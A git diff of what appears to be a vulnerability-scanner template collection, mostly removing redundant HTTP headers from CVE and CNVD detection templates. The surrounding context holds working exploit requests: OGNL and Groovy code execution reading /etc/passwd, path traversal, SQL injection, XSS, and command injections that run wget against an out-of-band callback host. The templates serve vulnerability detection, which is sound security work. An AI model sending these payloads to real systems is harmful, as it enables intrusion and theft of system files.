cves/2021/CVE-2021-27850.yaml | 9 +--- cves/2021/CVE-2021-28150.yaml | 17 +------- cves/2021/CVE-2021-28151.yaml | 22 +--------- cves/2021/CVE-2021-29203.yaml | 6 --- cves/2021/CVE-2021-30461.yaml | 4 -- cves/2021/CVE-2021-3129.yaml | 18 -------- cves/2021/CVE-2021-31755.yaml | 8 +--- cves/2021/CVE-2021-32030.yaml | 1 - cves/2021/CVE-2021-3297.yaml | 4 -- cves/2021/CVE-2021-33544.yaml | 3 -- cves/2021/CVE-2021-34429.yaml | 2 - cves/2021/CVE-2021-34621.yaml | 6 --- cves/2021/CVE-2021-35336.yaml | 4 +- default-logins/abb/cs141-default-login.yaml | 12 ------ .../aem/adobe-aem-default-credentials.yaml | 6 --- .../apache/airflow-default-credentials.yaml | 9 ---- .../apache-superset-default-credentials.yaml | 9 ---- .../dell/dell-idrac-default-login.yaml | 9 ++-- .../dell/dell-idrac9-default-login.yaml | 6 --- .../flir/flir-ax8-default-credentials.yaml | 5 --- default-logins/gitlab/gitlab-weak-login.yaml | 3 -- .../glpi/glpi-default-credential.yaml | 14 ------- .../grafana/grafana-default-credential.yaml | 5 --- .../hongdian/hongdian-default-password.yaml | 10 ----- .../ibm/ibm-storage-default-credential.yaml | 4 +- .../iptime/iptime-default-login.yaml | 4 +- .../nexus/nexus-default-password.yaml | 2 - .../oracle/oracle-bi-default-credentials.yaml | 6 +-- .../panabit/panabit-default-password.yaml | 3 -- .../rockmongo-default-credentials.yaml | 1 - .../spectracom-default-credential.yaml | 3 -- .../trilithic-viewpoint-default.yaml | 1 - .../wso2/wso2-default-password.yaml | 4 +- .../xxljob/xxljob-default-login.yaml | 1 - exposed-panels/acunetix-panel.yaml | 3 +- exposed-panels/atlassian-crowd-panel.yaml | 3 +- exposed-panels/checkmarx-panel.yaml | 3 +- exposed-panels/citrix-adc-gateway-detect.yaml | 4 +- exposed-panels/couchdb-exposure.yaml | 5 +-- exposed-panels/nessus-panel.yaml | 5 ++- .../prometheus-exporter-detect.yaml | 4 +- exposed-panels/solarwinds-orion.yaml | 3 +- .../configs/ruijie-eg-password-leak.yaml | 2 - .../ruijie-nbr1300g-cli-password-leak.yaml | 1 - .../logs/oracle-ebs-sqllog-disclosure.yaml | 2 - fuzzing/iis-shortname.yaml | 12 ------ fuzzing/xff-403-bypass.yaml | 12 ------ iot/targa-camera-ssrf.yaml | 4 -- misconfiguration/aem/aem-crx-bypass.yaml | 4 -- .../aem/aem-hash-querybuilder.yaml | 4 -- .../aem/aem-jcr-querybuilder.yaml | 4 -- misconfiguration/aspx-debug-mode.yaml | 2 - misconfiguration/cloudflare-image-ssrf.yaml | 3 -- .../iis-internal-ip-disclosure.yaml | 1 - .../ssrf-via-oauth-misconfig.yaml | 2 - technologies/clockwork-php-page.yaml | 3 +- technologies/dell/dell-idrac6-detect.yaml | 2 - technologies/dell/dell-idrac7-detect.yaml | 2 - technologies/dell/dell-idrac8-detect.yaml | 2 - technologies/dell/dell-idrac9-detect.yaml | 3 -- technologies/kibana-detect.yaml | 3 +- technologies/liferay-portal-detect.yaml | 3 +- technologies/pega-detect.yaml | 3 +- technologies/prometheus-exposed-panel.yaml | 3 +- .../apache/apache-flink-unauth-rce.yaml | 6 +-- .../jenkins/jenkins-stack-trace.yaml | 6 +-- .../jolokia/jolokia-heap-info-disclosure.yaml | 8 +--- .../oscommerce/oscommerce-rce.yaml | 7 ---- .../other/bullwark-momentum-lfi.yaml | 1 - .../other/core-chuangtian-cloud-rce.yaml | 5 --- vulnerabilities/other/couchdb-adminparty.yaml | 3 +- vulnerabilities/other/eyou-email-rce.yaml | 4 -- .../other/geovision-geowebserver-xss.yaml | 1 - vulnerabilities/other/gloo-unauth.yaml | 1 - .../other/hashicorp-consul-rce.yaml | 6 +-- .../other/hasura-graphql-ssrf.yaml | 7 +--- vulnerabilities/other/hiboss-rce.yaml | 5 --- .../other/hjtcloud-arbitrary-file-read.yaml | 4 -- .../other/huawei-router-auth-bypass.yaml | 5 --- vulnerabilities/other/jeewms-lfi.yaml | 2 - .../other/jfrog-unauth-build-exposed.yaml | 2 - .../other/kevinlab-bems-backdoor.yaml | 4 -- vulnerabilities/other/kevinlab-bems-sqli.yaml | 4 -- vulnerabilities/other/keycloak-xss.yaml | 3 -- .../other/landray-oa-fileread.yaml | 8 ---- .../other/maian-cart-preauth-rce.yaml | 10 ----- .../other/mida-eframework-xss.yaml | 2 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 - .../other/netgear-router-auth-bypass.yaml | 9 +--- .../other/netgear-wnap320-rce.yaml | 3 -- .../other/oa-tongda-path-traversal.yaml | 2 - vulnerabilities/other/oa-v9-uploads-file.yaml | 6 --- .../other/optilink-ont1gew-gpon-rce.yaml | 12 ++---- .../other/php-zerodium-backdoor-rce.yaml | 2 + .../other/powercreator-cms-rce.yaml | 4 -- ...-netkang-next-generation-firewall-rce.yaml | 4 +- .../other/rce-shellshock-user-agent.yaml | 6 ++- vulnerabilities/other/rconfig-rce.yaml | 15 +++---- vulnerabilities/other/ruijie-eg-rce.yaml | 5 --- .../other/ruijie-networks-rce.yaml | 4 -- vulnerabilities/other/sar2html-rce.yaml | 6 +-- .../other/showdoc-file-upload-rce.yaml | 3 -- .../other/simple-employee-rce.yaml | 10 +---- .../other/sonicwall-sslvpn-shellshock.yaml | 2 - vulnerabilities/other/vpms-auth-bypass.yaml | 6 +-- vulnerabilities/other/yapi-rce.yaml | 18 -------- .../other/zimbra-preauth-ssrf.yaml | 3 -- vulnerabilities/other/zms-auth-bypass.yaml | 10 ++--- .../rocketchat/unauth-message-read.yaml | 8 ---- .../wordpress-infinitewp-auth-bypass.yaml | 9 ---- .../wordpress-rce-simplefilelist.yaml | 7 ---- .../wordpress/wordpress-zebra-form-xss.yaml | 8 +--- .../wordpress/wp-multiple-theme-ssrf.yaml | 4 -- 198 files changed, 138 insertions(+), 1011 deletions(-) diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/CNVD-2020-68596.yaml index 9f1c78f053..56cd6901fd 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -12,24 +12,17 @@ requests: - | POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 5 Content-Type: application/x-www-form-urlencoded - Accept-Encoding: deflate "1":1 - | GET /public/index.php/home/file/user_pics HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - Accept-Encoding: deflate + - | GET {{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: deflate extractors: - type: regex diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/CNVD-2021-15822.yaml index b41d42c850..83e4dc3d9d 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/CNVD-2021-15822.yaml @@ -12,7 +12,6 @@ requests: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml index c6a28b6fb0..41c508efc2 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -14,7 +14,6 @@ requests: - | #linux POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); @@ -22,7 +21,6 @@ requests: - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("ipconfig"); diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 2837b0aa42..36ff315c20 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -17,11 +17,7 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index c6730730c0..0a1111e02c 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -16,9 +16,7 @@ requests: - | POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - Content-Length: 31 diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index 68a2b11bcd..a2bd566a60 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -18,10 +18,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "size": 1, diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 40dd85cb6b..79427e3ba5 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "name": "test" @@ -29,11 +26,7 @@ requests: POST /_search HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 4f7d3d42da..479d0f70f3 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -12,18 +12,12 @@ requests: - |+ GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - |+ POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Connection: close - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Accept: */* - Content-Length: 56 Content-Type: application/x-www-form-urlencoded wp-submit=Get+New+Password&redirect_to=&user_login={{username}} diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 05119f088c..26b9577ef4 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -16,7 +16,6 @@ requests: - | GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - Content-Length: 4 matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 41d8c711b1..16dc0d9801 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -17,10 +17,7 @@ requests: - | POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host: {{Hostname}} - Connection: close - Content-Length: 160 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 2782404f8a..26de578c10 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: text/xml - Content-Length: 5178 diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 88173e6fbf..5565f23393 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -13,11 +13,7 @@ requests: - | PUT /_users/org.couchdb.user:poc HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 108 { "type": "user", diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 87579df08b..9772411357 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -16,35 +16,28 @@ requests: - | POST /maint/index.php?packages HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/maint/index.php?packages - Content-Length: 160 Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: {{Hostname}}/maint/index.php?packages Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 0677931936..2de5b8d83a 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -13,10 +13,7 @@ requests: - | POST / HTTP/1.1 Host: {{Hostname}} - Content-Length: 264 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ - Accept-Encoding: gzip, deflate - Connection: close ------WebKitFormBoundaryKc8fBVDo558U4hbJ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" @@ -34,9 +31,6 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip,deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close req-condition: true matchers: diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 136b15b2b5..ab048ea172 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -14,11 +14,9 @@ info: requests: - raw: - | - GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 + GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: */* - Connection: close payloads: endpoint: diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 954ace9e22..5ccba81a04 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -16,10 +16,8 @@ requests: POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml - User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 - Content-Length: 873 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index e09313bde2..ad22c9704a 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -13,11 +13,7 @@ requests: GET / HTTP/1.1 Host: {{Hostname}} Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 - Accept-Language: en Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data - Connection: Keep-Alive - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) - Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* matchers: diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0d45c0ac48..30ca442da3 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -17,10 +17,6 @@ requests: GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 matchers: - type: word diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 257292c0b8..c2ae610bf1 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -13,12 +13,8 @@ requests: - | GET /__ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest - Connection: close Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini matchers-condition: and diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 583039f7e5..0a1de31159 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -18,78 +18,42 @@ requests: - | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index e00ef15315..961e31302a 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -12,21 +12,15 @@ requests: - | POST /jolokia/read/getDiagnosticOptions HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 167 { - "type" : "read", - "mbean" : "java.lang:type=Memory", - "target" : { - "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" - } + "type":"read", + "mbean":"java.lang:type=Memory", + "target":{ + "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" + } } matchers-condition: and @@ -35,6 +29,7 @@ requests: words: - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389" part: body + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index d2feac4619..4591ccbbf3 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -17,8 +17,6 @@ requests: - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 45 Content-Type: application/x-www-form-urlencoded query=--open-files-in-pager=cat%20/etc/passwd diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 6001320f0c..0c21319c5d 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -12,8 +12,6 @@ requests: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index c775728787..f134dc0cba 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -15,8 +15,6 @@ requests: - | POST /system/sharedir.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &uid=10; wget http://{{interactsh-url}} @@ -24,8 +22,6 @@ requests: - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &act=sync&task_number=1;wget http://{{interactsh-url}} diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 31ab970f95..9f8c759dfc 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -15,10 +15,6 @@ requests: - | POST /upload HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index b59d969f15..d04aa76fc8 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -15,7 +15,6 @@ requests: - | GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index fbcb014f26..433bc92b78 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,6 @@ requests: - | GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} matchers: diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index e6423cda4b..51fa08f10d 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -13,7 +13,6 @@ requests: - |+ GET /etc/passwd HTTP/1.1 Host: - Content-Length: 4 unsafe: true matchers-condition: and @@ -21,6 +20,7 @@ requests: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index d5b0522d34..49b4dc9d42 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -19,13 +19,10 @@ requests: - | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 - | GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 extractors: - type: regex diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index a92638e44f..9aff058ee4 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -12,13 